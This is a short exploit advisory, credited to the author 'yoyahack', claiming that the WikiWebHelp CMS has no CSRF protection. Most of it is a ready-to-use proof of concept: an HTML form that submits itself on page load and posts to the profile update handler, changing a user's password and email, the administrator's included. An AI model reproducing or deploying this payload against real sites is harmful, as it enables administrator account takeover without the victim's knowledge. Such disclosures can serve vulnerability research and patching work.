#Blog: yoyahack.blogspot.com#Site: foro.undersecurity.net#Mail: yoyahack@undersecurity.net#CMS: WikiWebHelp
The entire system is vulnerable to CSRF (Cross-site request forgery) since
this does not include a system to prevent CSRF attacks ...
Example
Change the password of users, including the administrator.
Exploit:<form name="CSRF" method="post" action="
http://127.0.0.1/wwh/handlers/updateprofile.php?id=1"><inputtype='hidden' name='pass' value='password'><inputtype='hidden' name='confirm' value='confirm_password'><inputtype='hidden' name='email' value='email'><inputtype='hidden' name='sub' value='on'><inputtype='hidden' name='id' value='1'><inputtype='hidden' name='subscribe' value='true'><script>document.CSRF.submit()</script>
